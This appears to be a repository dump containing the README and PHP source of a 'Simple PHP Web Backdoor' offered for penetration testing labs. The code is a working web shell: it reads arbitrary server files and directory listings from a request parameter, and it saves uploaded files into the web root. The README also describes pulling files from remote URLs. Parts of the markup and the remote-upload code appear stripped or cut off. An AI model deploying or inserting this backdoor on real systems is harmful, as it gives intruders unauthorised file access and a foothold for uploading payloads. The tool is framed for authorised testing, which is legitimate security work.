├── README.md └── shell.php /README.md: -------------------------------------------------------------------------------- 1 | # Simple PHP Web Backdoor 2 | 3 | 4 | 5 | A simple PHP web backdoor allows you to retrieve directory/file contents and upload file(s) from the local machine or remote URL. 6 | 7 | It is handy if standard PHP web shells are restricted (e.g. system function disabled and such). I used this when performing penetration testing on security labs and Hack The Box, and it works great! 8 | 9 | ## Features 10 | 11 | ### Retrieve File/Scan Directory 12 | 13 | 14 | 15 | Enter the path you want to explore. 16 | 17 | If it's a directory, it will list all the items in the directory. Otherwise, it will show the content of the file. 18 | 19 | ### Upload File From Your Local 20 | 21 | Upload any file from your local computer. You can upload one or more files. 22 | 23 | The backdoor will save the file in the same working directory. 24 | 25 | ### Upload File From URL 26 | 27 | Upload any file from a remote URL. You need to specify the output file name and the URL of the remote file. 28 | 29 | Make sure the host can access the remote file. 30 | 31 | ## Disclaimer 32 | 33 | This script is only for permitted penetration testing and security research, and I will not be responsible if you use it for illegal activities. 34 | -------------------------------------------------------------------------------- /shell.php: -------------------------------------------------------------------------------- 1 | Retrieve File/Scan Directory
2 | Current file path:
3 |
4 | Path: 5 | 6 |
7 |
 8 | Realpath: ' . realpath($_GET['path']) . '
'; 16 | echo 'Type: '; 17 | if (is_dir($path)) { 18 | echo 'Directory
'; 19 | foreach (scandir($path) as $data) { 20 | echo $data . "
"; 21 | } 22 | } else { 23 | echo 'File
'; 24 | print_r(file_get_contents($path)); 25 | } 26 | } 27 | ?> 28 |
29 |
30 | Upload File From Your Local
31 |
32 | File(s): 33 | 34 |
35 | 0) { 37 | $total = count($_FILES['uploads']['name']); 38 | for ($i = 0; $i < $total; $i++) { 39 | $tmpPath = $_FILES['uploads']['tmp_name'][$i]; 40 | if ($tmpPath != '') { 41 | $newPath = './' . $_FILES['uploads']['name'][$i]; 42 | if (move_uploaded_file($tmpPath, $newPath)) { 43 | echo 'Successfully uploaded ' .$_FILES['uploads']['name'][$i] . '
'; 44 | } else { 45 | echo 'Unable to upload ' .$_FILES['uploads']['name'][$i] . '
'; 46 | } 47 | } 48 | } 49 | } 50 | ?> 51 |
52 | Upload File From URL
53 |
54 | Filename to save:
55 | URL: 56 | 57 |
58 |
59 | 
68 | 
69 | --------------------------------------------------------------------------------